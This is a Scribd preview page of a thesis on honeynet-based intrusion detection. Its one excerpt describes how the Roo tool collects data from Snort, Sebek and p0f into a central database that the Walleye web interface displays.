P. 1
Jan Gerrit Göbel- Advanced Honeynet Based Intrusion Detection

Jan Gerrit Göbel- Advanced Honeynet Based Intrusion Detection

|Views: 168|Likes:
Published by White909

More info:

Published by: White909 on Dec 01, 2011
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less





As described in the previous chapter, various distinct tools, like Snort, Sebek and p0f,
are used to accumulate information from the Honeynet. For these tools are usually not
designed to interact with each other, they all produce different output of collected data
in an incompatible format. In case of a successful compromise of a Honeypot, it takes
a lot of time and effort to gather all the data related to the incident, i.e. one has to
parse through all logfiles manually, extracting the related information in order to get a
comprehensive overview about what happened. Roo is able to collect all this information
from the individual sources and proportion it in an automated manner. The combined
data is then stored in a single centralized database for further investigation, e.g. with
the help of the web interface, Walleye. Thus, it is possible to easily view attack patterns
or even complete process trees of actions taken on Honeypots which are currently under
control of an attacker. Roo is available at the Honeynet Project homepage and is under
constant development [Pro05c].

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->